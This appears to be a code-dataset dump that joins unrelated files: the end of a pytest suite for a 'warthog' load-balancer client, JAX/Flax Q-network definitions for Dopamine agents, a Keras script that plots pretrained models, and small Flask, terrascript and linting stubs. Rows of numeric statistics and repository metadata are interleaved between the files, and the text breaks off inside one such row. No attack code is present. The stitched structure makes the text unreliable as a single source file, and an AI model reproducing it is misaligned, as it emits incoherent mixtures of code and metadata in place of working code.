cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_unknown_error(self, transport, response):
response.text = ''
response.status_code = 503
response.ok = False
response.json.return_value = dict(SOME_CRAZY_ERROR)
with pytest.raises(warthog.exceptions.WarthogApiError):
cmd = warthog.core.NodeEnableCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_success(self, transport, response):
result = dict(NODE_ALTER)
result['server']['action'] = 'enable'
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = result
cmd = warthog.core.NodeEnableCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
got_enabled = cmd.send()
assert got_enabled, 'Did not get get expected True result from node enable'
assert transport.post.called, 'Expected transport ".post() to be called'
class TestNodeDisableCommand(object):
def test_send_invalid_session(self, transport, response):
response.text = ''
response.status_code = 401
response.ok = False
response.json.return_value = dict(INVALID_SESSION)
with pytest.raises(warthog.exceptions.WarthogInvalidSessionError):
cmd = warthog.core.NodeDisableCommand(
transport, SCHEME_HOST, '1234', 'bad.example.com')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_no_such_server(self, transport, response):
response.text = ''
response.status_code = 404
response.ok = False
response.json.return_value = dict(NO_SUCH_SERVER)
with pytest.raises(warthog.exceptions.WarthogNoSuchNodeError):
cmd = warthog.core.NodeDisableCommand(
transport, SCHEME_HOST, '1234', 'bad.example.com')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_no_permissions(self, transport, response):
response.text = ''
response.status_code = 400
response.ok = False
response.json.return_value = dict(NO_PERMISSIONS)
with pytest.raises(warthog.exceptions.WarthogPermissionError):
cmd = warthog.core.NodeDisableCommand(
transport, SCHEME_HOST, '1234', 'app1.example.com')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_unknown_error(self, transport, response):
response.text = ''
response.status_code = 503
response.ok = False
response.json.return_value = dict(SOME_CRAZY_ERROR)
with pytest.raises(warthog.exceptions.WarthogApiError):
cmd = warthog.core.NodeDisableCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
cmd.send()
assert transport.post.called, 'Expected transport ".post() to be called'
def test_send_success(self, transport, response):
result = dict(NODE_ALTER)
result['server']['action'] = 'disable'
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = result
cmd = warthog.core.NodeDisableCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
got_disabled = cmd.send()
assert got_disabled, 'Did not get get expected True result from node disable'
assert transport.post.called, 'Expected transport ".post() to be called'
class TestNodeStatusCommand(object):
def test_send_invalid_session(self, transport, response):
response.text = ''
response.status_code = 401
response.ok = False
response.json.return_value = dict(INVALID_SESSION)
with pytest.raises(warthog.exceptions.WarthogInvalidSessionError):
cmd = warthog.core.NodeStatusCommand(
transport, SCHEME_HOST, '1234', 'bad.example.com')
cmd.send()
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_no_such_server(self, transport, response):
response.text = ''
response.status_code = 404
response.ok = False
response.json.return_value = dict(NO_SUCH_SERVER)
with pytest.raises(warthog.exceptions.WarthogNoSuchNodeError):
cmd = warthog.core.NodeStatusCommand(
transport, SCHEME_HOST, '1234', 'bad.example.com')
cmd.send()
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_unknown_error(self, transport, response):
response.text = ''
response.status_code = 503
response.ok = False
response.json.return_value = dict(SOME_CRAZY_ERROR)
with pytest.raises(warthog.exceptions.WarthogApiError):
cmd = warthog.core.NodeStatusCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
cmd.send()
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_server_enabled(self, transport, response):
result = dict(NODE_OPER)
result['server']['oper']['state'] = 'Up'
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = result
cmd = warthog.core.NodeStatusCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
status = cmd.send()
assert warthog.core.STATUS_ENABLED == status, 'Did not get expected enabled status'
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_server_disabled(self, transport, response):
result = dict(NODE_OPER)
result['server']['oper']['state'] = 'Disabled'
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = result
cmd = warthog.core.NodeStatusCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
status = cmd.send()
assert warthog.core.STATUS_DISABLED == status, 'Did not get expected disabled status'
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_server_down(self, transport, response):
result = dict(NODE_OPER)
result['server']['oper']['state'] = 'Down'
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = result
cmd = warthog.core.NodeStatusCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
status = cmd.send()
assert warthog.core.STATUS_DOWN == status, 'Did not get expected down status'
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_server_no_known_status(self, transport, response):
result = dict(NODE_OPER)
result['server']['oper']['state'] = 'Shutdown'
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = result
with pytest.raises(warthog.exceptions.WarthogNodeStatusError):
cmd = warthog.core.NodeStatusCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
cmd.send()
assert transport.get.called, 'Expected transport ".get() to be called'
class TestNodeActiveConnectionsCommand(object):
def test_send_invalid_session(self, transport, response):
response.text = ''
response.status_code = 401
response.ok = False
response.json.return_value = dict(INVALID_SESSION)
with pytest.raises(warthog.exceptions.WarthogInvalidSessionError):
cmd = warthog.core.NodeActiveConnectionsCommand(
transport, SCHEME_HOST, '1234', 'bad.example.com')
cmd.send()
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_no_such_server(self, transport, response):
response.text = ''
response.status_code = 404
response.ok = False
response.json.return_value = dict(NO_SUCH_SERVER)
with pytest.raises(warthog.exceptions.WarthogNoSuchNodeError):
cmd = warthog.core.NodeActiveConnectionsCommand(
transport, SCHEME_HOST, '1234', 'bad.example.com')
cmd.send()
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_unknown_error(self, transport, response):
response.text = ''
response.status_code = 503
response.ok = False
response.json.return_value = dict(SOME_CRAZY_ERROR)
with pytest.raises(warthog.exceptions.WarthogApiError):
cmd = warthog.core.NodeActiveConnectionsCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
cmd.send()
assert transport.get.called, 'Expected transport ".get() to be called'
def test_send_success(self, transport, response):
result = dict(NODE_STATS)
result['server']['stats']['curr-conn'] = 42
response.text = ''
response.status_code = 200
response.ok = True
response.json.return_value = result
cmd = warthog.core.NodeActiveConnectionsCommand(
transport, SCHEME_HOST, '1234', 'good.example.com')
connections = cmd.send()
assert 42 == connections, 'Did not get expected active connections'
assert transport.get.called, 'Expected transport ".get() to be called'
| 34.008929 | 99 | 0.593332 | 1,996 | 19,045 | 5.518537 | 0.107715 | 0.029959 | 0.025965 | 0.061371 | 0.814435 | 0.780844 | 0.772764 | 0.769496 | 0.737721 | 0.726101 | 0 | 0.028923 | 0.291993 | 19,045 | 559 | 100 | 34.069767 | 0.787971 | 0.001103 | 0 | 0.649891 | 0 | 0.004376 | 0.208075 | 0.023236 | 0 | 0 | 0 | 0 | 0.07221 | 1 | 0.061269 | false | 0.013129 | 0.010941 | 0.002188 | 0.089716 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
67b983c677529c6b0fbc3853f722a8b68c48bd61 | 13,073 | py | Python | revisiting_rainbow/networks_new.py | jiawei415/revisiting_rainbow | 7cd2bc6f64d08ebc2233d93210063cc64d2598a7 | [
"Apache-2.0"
] | 72 | 2020-11-24T22:12:59.000Z | 2022-03-21T21:18:21.000Z | revisiting_rainbow/networks_new.py | jiawei415/revisiting_rainbow | 7cd2bc6f64d08ebc2233d93210063cc64d2598a7 | [
"Apache-2.0"
] | 2 | 2021-06-02T08:01:10.000Z | 2021-07-03T03:11:54.000Z | revisiting_rainbow/networks_new.py | jiawei415/revisiting_rainbow | 7cd2bc6f64d08ebc2233d93210063cc64d2598a7 | [
"Apache-2.0"
] | 6 | 2021-01-13T22:15:17.000Z | 2021-11-04T04:00:05.000Z | """Various networks for Jax Dopamine agents."""
from dopamine.discrete_domains import atari_lib
from dopamine.discrete_domains import gym_lib
from flax import linen as nn
import gin
import jax
import jax.numpy as jnp
import numpy as onp
from jax import random
import math
from jax.tree_util import tree_flatten, tree_map
#---------------------------------------------------------------------------------------------------------------------
env_inf = {"CartPole":{"MIN_VALS": jnp.array([-2.4, -5., -math.pi/12., -math.pi*2.]),"MAX_VALS": jnp.array([2.4, 5., math.pi/12., math.pi*2.])},
"Acrobot":{"MIN_VALS": jnp.array([-1., -1., -1., -1., -5., -5.]),"MAX_VALS": jnp.array([1., 1., 1., 1., 5., 5.])},
"MountainCar":{"MIN_VALS":jnp.array([-1.2, -0.07]),"MAX_VALS": jnp.array([0.6, 0.07])}
}
prn_inf = {"count":0, "rng2_":None, "rng3_":None}
#---------------------------------------------------------------------------------------------------------------------
class NoisyNetwork(nn.Module):
features: int
rng: int
bias_in: bool
@nn.compact
def __call__(self, x):
def sample_noise(rng_input, shape):
noise = jax.random.normal(rng_input,shape)
return noise
def f(x):
return jnp.multiply(jnp.sign(x), jnp.power(jnp.abs(x), 0.5))
# Initializer of \mu and \sigma
def mu_init(key, shape, rng):
low = -1*1/jnp.power(x.shape[-1], 0.5)
high = 1*1/jnp.power(x.shape[-1], 0.5)
return random.uniform(rng, shape=shape, dtype=jnp.float32, minval=low, maxval=high)
def sigma_init(key, shape, dtype=jnp.float32): return jnp.ones(shape, dtype)*(0.1 / jnp.sqrt(x.shape[-1]))
rng, rng2, rng3, rng4, rng5 = jax.random.split(self.rng, 5)
if prn_inf["count"] == 0:
prn_inf["rng2_"] = rng2
prn_inf["rng3_"] = rng3
prn_inf["count"] = prn_inf["count"]+1
# Sample noise from gaussian
p = sample_noise(prn_inf["rng2_"], [x.shape[-1], 1])
q = sample_noise(prn_inf["rng3_"], [1, self.features])
f_p = f(p); f_q = f(q)
w_epsilon = f_p*f_q; b_epsilon = jnp.squeeze(f_q)
w_mu = self.param('kernel', mu_init, (x.shape[-1], self.features), rng4)
w_sigma = self.param('kernell', sigma_init, (x.shape[-1], self.features))
w = w_mu + jnp.multiply(w_sigma, w_epsilon)
ret = jnp.matmul(x, w)
b_mu = self.param('bias', mu_init, (self.features,), rng5)
b_sigma = self.param('biass',sigma_init, (self.features,))
b = b_mu + jnp.multiply(b_sigma, b_epsilon)
return jnp.where(self.bias_in, ret + b, ret)
#---------------------------------------------< DQNNetwork >----------------------------------------------------------
@gin.configurable
class DQNNetwork(nn.Module):
num_actions:int
net_conf: str
env: str
normalize_obs:bool
noisy: bool
dueling: bool
initzer:str
hidden_layer: int
neurons: int
@nn.compact
def __call__(self, x , rng):
if self.net_conf == 'minatar':
x = x.squeeze(3)
x = x.astype(jnp.float32)
x = nn.Conv(features=16, kernel_size=(3, 3), strides=(1, 1), kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = x.reshape((-1))
elif self.net_conf == 'atari':
# We need to add a "batch dimension" as nn.Conv expects it, yet vmap will
# have removed the true batch dimension.
x = x.astype(jnp.float32) / 255.
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = x.reshape((-1)) # flatten
elif self.net_conf == 'classic':
#classic environments
x = x.astype(jnp.float32)
x = x.reshape((-1))
if self.env is not None and self.env in env_inf:
x = x - env_inf[self.env]['MIN_VALS']
x /= env_inf[self.env]['MAX_VALS'] - env_inf[self.env]['MIN_VALS']
x = 2.0 * x - 1.0
if self.noisy:
def net(x, features, rng):
return NoisyNetwork(features, rng=rng, bias_in=True)(x)
else:
def net(x, features, rng):
return nn.Dense(features, kernel_init=self.initzer)(x)
for _ in range(self.hidden_layer):
x = net(x, features=self.neurons, rng=rng)
x = jax.nn.relu(x)
adv = net(x, features=self.num_actions, rng=rng)
val = net(x, features=1, rng=rng)
dueling_q = val + (adv - (jnp.mean(adv, -1, keepdims=True)))
non_dueling_q = net(x, features=self.num_actions, rng=rng)
q_values = jnp.where(self.dueling, dueling_q, non_dueling_q)
return atari_lib.DQNNetworkType(q_values)
#---------------------------------------------< RainbowDQN >----------------------------------------------------------
@gin.configurable
class RainbowDQN(nn.Module):
num_actions:int
net_conf:str
env:str
normalize_obs:bool
noisy:bool
dueling:bool
initzer:str
num_atoms:int
hidden_layer:int
neurons:int
@nn.compact
def __call__(self, x, support, rng):
if self.net_conf == 'minatar':
x = x.squeeze(3)
x = x.astype(jnp.float32)
x = nn.Conv(features=16, kernel_size=(3, 3), strides=(1, 1), kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = x.reshape((-1))
elif self.net_conf == 'atari':
# We need to add a "batch dimension" as nn.Conv expects it, yet vmap will
# have removed the true batch dimension.
x = x.astype(jnp.float32) / 255.
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = x.reshape((-1)) # flatten
elif self.net_conf == 'classic':
x = x.astype(jnp.float32)
x = x.reshape((-1))
if self.env is not None and self.env in env_inf:
x = x - env_inf[self.env]['MIN_VALS']
x /= env_inf[self.env]['MAX_VALS'] - env_inf[self.env]['MIN_VALS']
x = 2.0 * x - 1.0
if self.noisy:
def net(x, features, rng):
return NoisyNetwork(features, rng=rng, bias_in=True)(x)
else:
def net(x, features, rng):
return nn.Dense(features, kernel_init=self.initzer)(x)
for _ in range(self.hidden_layer):
x = net(x, features=self.neurons, rng=rng)
x = jax.nn.relu(x)
if self.dueling:
adv = net(x,features=self.num_actions * self.num_atoms, rng=rng)
value = net(x, features=self.num_atoms, rng=rng)
adv = adv.reshape((self.num_actions, self.num_atoms))
value = value.reshape((1, self.num_atoms))
logits = value + (adv - (jnp.mean(adv, -2, keepdims=True)))
probabilities = nn.softmax(logits)
q_values = jnp.sum(support * probabilities, axis=1)
else:
x = net(x, features=self.num_actions * self.num_atoms, rng=rng)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.sum(support * probabilities, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
#---------------------------------------------< QuantileNetwork >----------------------------------------------------------
@gin.configurable
class QuantileNetwork(nn.Module):
num_actions:int
net_conf:str
env:str
normalize_obs:bool
noisy:bool
dueling:bool
initzer:str
num_atoms:int
hidden_layer:int
neurons:int
@nn.compact
def __call__(self, x, rng):
if self.net_conf == 'minatar':
x = x.squeeze(3)
x = x.astype(jnp.float32)
x = nn.Conv(features=16, kernel_size=(3, 3), strides=(1, 1), kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = x.reshape((-1))
elif self.net_conf == 'atari':
# We need to add a "batch dimension" as nn.Conv expects it, yet vmap will
# have removed the true batch dimension.
x = x.astype(jnp.float32) / 255.
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = x.reshape((-1)) # flatten
elif self.net_conf == 'classic':
#classic environments
x = x.astype(jnp.float32)
x = x.reshape((-1))
if self.env is not None and self.env in env_inf:
x = x - env_inf[self.env]['MIN_VALS']
x /= env_inf[self.env]['MAX_VALS'] - env_inf[self.env]['MIN_VALS']
x = 2.0 * x - 1.0
if self.noisy:
def net(x, features, rng):
return NoisyNetwork(features, rng=rng, bias_in=True)(x)
else:
def net(x, features, rng):
return nn.Dense(features, kernel_init=self.initzer)(x)
for _ in range(self.hidden_layer):
x = net(x, features=self.neurons, rng=rng)
x = jax.nn.relu(x)
if self.dueling:
adv = net(x,features=self.num_actions * self.num_atoms, rng=rng)
value = net(x, features=self.num_atoms, rng=rng)
adv = adv.reshape((self.num_actions, self.num_atoms))
value = value.reshape((1, self.num_atoms))
logits = value + (adv - (jnp.mean(adv, -2, keepdims=True)))
probabilities = nn.softmax(logits)
q_values = jnp.mean(logits, axis=1)
else:
x = net(x, features=self.num_actions * self.num_atoms, rng=rng)
logits = x.reshape((self.num_actions, self.num_atoms))
probabilities = nn.softmax(logits)
q_values = jnp.mean(logits, axis=1)
return atari_lib.RainbowNetworkType(q_values, logits, probabilities)
#---------------------------------------------< IQ-Network >----------------------------------------------------------
@gin.configurable
class ImplicitQuantileNetwork(nn.Module):
num_actions:int
net_conf:str
env:str
noisy:bool
dueling:bool
initzer:str
quantile_embedding_dim:int
hidden_layer:int
neurons:int
@nn.compact
def __call__(self, x, num_quantiles, rng):
if self.net_conf == 'minatar':
x = x.squeeze(3)
x = x.astype(jnp.float32)
x = nn.Conv(features=16, kernel_size=(3, 3), strides=(1, 1), kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = x.reshape((-1))
elif self.net_conf == 'atari':
# We need to add a "batch dimension" as nn.Conv expects it, yet vmap will
# have removed the true batch dimension.
x = x.astype(jnp.float32) / 255.
x = nn.Conv(features=32, kernel_size=(8, 8), strides=(4, 4),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = nn.Conv(features=64, kernel_size=(4, 4), strides=(2, 2),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = nn.Conv(features=64, kernel_size=(3, 3), strides=(1, 1),
kernel_init=self.initzer)(x)
x = jax.nn.relu(x)
x = x.reshape((-1)) # flatten
elif self.net_conf == 'classic':
#classic environments
x = x.astype(jnp.float32)
x = x.reshape((-1))
if self.env is not None and self.env in env_inf:
x = x - env_inf[self.env]['MIN_VALS']
x /= env_inf[self.env]['MAX_VALS'] - env_inf[self.env]['MIN_VALS']
x = 2.0 * x - 1.0
if self.noisy:
def net(x, features, rng):
return NoisyNetwork(features, rng=rng, bias_in=True)(x)
else:
def net(x, features, rng):
return nn.Dense(features, kernel_init=self.initzer)(x)
for _ in range(self.hidden_layer):
x = net(x, features=self.neurons, rng=rng)
x = jax.nn.relu(x)
state_vector_length = x.shape[-1]
state_net_tiled = jnp.tile(x, [num_quantiles, 1])
quantiles_shape = [num_quantiles, 1]
quantiles = jax.random.uniform(rng, shape=quantiles_shape)
quantile_net = jnp.tile(quantiles, [1, self.quantile_embedding_dim])
quantile_net = (
jnp.arange(1, self.quantile_embedding_dim + 1, 1).astype(jnp.float32)
* onp.pi
* quantile_net)
quantile_net = jnp.cos(quantile_net)
quantile_net = nn.Dense(features=state_vector_length,
kernel_init=self.initzer)(quantile_net)
quantile_net = jax.nn.relu(quantile_net)
x = state_net_tiled * quantile_net
adv = net(x,features=self.num_actions, rng=rng)
val = net(x, features=1, rng=rng)
dueling_q = val + (adv - (jnp.mean(adv, -1, keepdims=True)))
non_dueling_q = net(x, features=self.num_actions, rng=rng)
quantile_values = jnp.where(self.dueling, dueling_q, non_dueling_q)
return atari_lib.ImplicitQuantileNetworkType(quantile_values, quantiles) | 34.222513 | 144 | 0.587088 | 1,942 | 13,073 | 3.816684 | 0.099897 | 0.017269 | 0.038856 | 0.059498 | 0.759039 | 0.740826 | 0.727739 | 0.727739 | 0.727739 | 0.717755 | 0 | 0.025556 | 0.218772 | 13,073 | 382 | 145 | 34.222513 | 0.700186 | 0.102731 | 0 | 0.753425 | 0 | 0 | 0.027173 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058219 | false | 0 | 0.034247 | 0.034247 | 0.304795 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db012649c87eefefef621e4869b74e7216f92bdf | 2,979 | py | Python | tf/applicationsNet/resnetTest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | tf/applicationsNet/resnetTest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | tf/applicationsNet/resnetTest.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | #%%
import os
import time
import shutil
import numpy as np
import tensorflow as tf
#%%
scal = 224
sampleModel = tf.keras.applications.ResNet50V2(weights='imagenet',
include_top=True,
input_shape=(scal, scal, 3))
sampleModel.trianable = False
tf.keras.utils.plot_model(sampleModel, to_file='ResNet50V2.png',show_shapes=True, show_layer_names=True)
# %%
scal = 224
sampleModel = tf.keras.applications.Xception(weights='imagenet',
include_top=False,
input_shape=(scal, scal, 3))
sampleModel.trianable = False
tf.keras.utils.plot_model(sampleModel, to_file='Xception.png',show_shapes=True, show_layer_names=True)
# %%
scal = 224
sampleModel = tf.keras.applications.MobileNetV2(weights='imagenet',
include_top=False,
input_shape=(scal, scal, 3))
sampleModel.trianable = False
tf.keras.utils.plot_model(sampleModel, to_file='MobileNetV2.png',show_shapes=True, show_layer_names=True)
# %%
scal = 224
sampleModel = tf.keras.applications.NASNetMobile(weights='imagenet',
include_top=False,
input_shape=(scal, scal, 3))
sampleModel.trianable = False
tf.keras.utils.plot_model(sampleModel, to_file='NASNetMobile.png',show_shapes=True, show_layer_names=True)
# %%
scal = 224
sampleModel = tf.keras.applications.DenseNet201(weights='imagenet',
include_top=False,
input_shape=(scal, scal, 3))
sampleModel.trianable = False
tf.keras.utils.plot_model(sampleModel, to_file='DenseNet201.png',show_shapes=True, show_layer_names=True)
# %%
scal = 224
sampleModel = tf.keras.applications.DenseNet121(weights='imagenet',
include_top=False,
input_shape=(scal, scal, 3))
sampleModel.trianable = False
tf.keras.utils.plot_model(sampleModel, to_file='DenseNet121.png',show_shapes=True, show_layer_names=True)
# %%
scal = 224
sampleModel = tf.keras.applications.InceptionResNetV2(weights='imagenet',
include_top=False,
input_shape=(scal, scal, 3))
sampleModel.trianable = False
tf.keras.utils.plot_model(sampleModel, to_file='InceptionResNetV2.png',show_shapes=True, show_layer_names=True)
# %%
scal = 224
sampleModel = tf.keras.applications.InceptionV3(weights='imagenet',
include_top=False,
input_shape=(scal, scal, 3))
sampleModel.trianable = False
tf.keras.utils.plot_model(sampleModel, to_file='InceptionV3.png',show_shapes=True, show_layer_names=True)
# %%
sampleModel.summary()
# %%
| 27.081818 | 111 | 0.601544 | 312 | 2,979 | 5.564103 | 0.137821 | 0.064516 | 0.082949 | 0.092166 | 0.830645 | 0.830645 | 0.809332 | 0.809332 | 0.789171 | 0.789171 | 0 | 0.026667 | 0.295065 | 2,979 | 109 | 112 | 27.330275 | 0.8 | 0.010406 | 0 | 0.574074 | 0 | 0 | 0.06367 | 0.00715 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.092593 | 0 | 0.092593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db34899a3760e9f633a4ec94b29a8d98b8b26ceb | 388 | py | Python | terrascript/provider/sematext.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/provider/sematext.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/provider/sematext.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/provider/sematext.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.provider.sematext
#
# instead of
#
# >>> import terrascript.provider.sematext.sematext
#
# This is only available for 'official' and 'partner' providers.
from terrascript.provider.sematext.sematext import *
| 25.866667 | 73 | 0.75 | 49 | 388 | 5.938776 | 0.693878 | 0.261168 | 0.371134 | 0.226804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035608 | 0.131443 | 388 | 14 | 74 | 27.714286 | 0.827893 | 0.796392 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e1ec31f599c81b48d55d93a427db165197408aa6 | 508 | py | Python | views/quality.py | jumbalaya09/net-me | 72a9d2bd0883b74169aa24c9ded4acf85b651c1d | [
"MIT"
] | null | null | null | views/quality.py | jumbalaya09/net-me | 72a9d2bd0883b74169aa24c9ded4acf85b651c1d | [
"MIT"
] | null | null | null | views/quality.py | jumbalaya09/net-me | 72a9d2bd0883b74169aa24c9ded4acf85b651c1d | [
"MIT"
] | null | null | null | from flask import Blueprint, render_template
quality = Blueprint('quality', __name__)
@quality.route('/')
@quality.route('/index')
@quality.route('/home')
def home():
return render_template('/quality/index.html')
@quality.route('/routers')
def q_routers():
return render_template('/quality/index.html')
@quality.route('/firewalls')
def q_fws():
return render_template('/quality/index.html')
@quality.route('/switches')
def q_switches():
return render_template('/quality/index.html')
| 19.538462 | 49 | 0.714567 | 62 | 508 | 5.66129 | 0.306452 | 0.205128 | 0.299145 | 0.307692 | 0.512821 | 0.512821 | 0.410256 | 0.410256 | 0 | 0 | 0 | 0 | 0.110236 | 508 | 25 | 50 | 20.32 | 0.776549 | 0 | 0 | 0.25 | 0 | 0 | 0.240157 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.0625 | 0.25 | 0.5625 | 0.125 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
c0247e75f411faf1d31506ade2f7f3070bfa7ac7 | 92 | py | Python | dockermake/lint/rules/builder_stages.py | fi-ts/docker-make | e434ff783bd07cf2377bba36bf29528182af883d | [
"MIT"
] | 2 | 2020-04-28T08:12:56.000Z | 2021-06-19T00:59:16.000Z | dockermake/lint/rules/builder_stages.py | fi-ts/docker-make | e434ff783bd07cf2377bba36bf29528182af883d | [
"MIT"
] | 5 | 2020-07-30T07:06:57.000Z | 2021-04-20T09:44:23.000Z | dockermake/lint/rules/builder_stages.py | fi-ts/docker-make | e434ff783bd07cf2377bba36bf29528182af883d | [
"MIT"
] | 2 | 2020-08-18T08:39:01.000Z | 2021-04-20T13:24:18.000Z | from dockermake.lint.rules import RulesBase
class BuilderStagesRules(RulesBase):
pass
| 15.333333 | 43 | 0.804348 | 10 | 92 | 7.4 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141304 | 92 | 5 | 44 | 18.4 | 0.936709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
c03424cd0b6c836886648fa5da44cbc84497b430 | 43 | py | Python | vipcca/model/__init__.py | jhu99/VIPCCA | 09fb890a0e87ec42637a67886e60b265f125bda2 | [
"MIT"
] | 5 | 2021-08-04T13:17:59.000Z | 2022-03-04T07:57:16.000Z | vipcca/model/__init__.py | jhu99/VIPCCA | 09fb890a0e87ec42637a67886e60b265f125bda2 | [
"MIT"
] | 2 | 2021-09-12T11:32:08.000Z | 2022-01-23T05:33:59.000Z | vipcca/model/__init__.py | jhu99/VIPCCA | 09fb890a0e87ec42637a67886e60b265f125bda2 | [
"MIT"
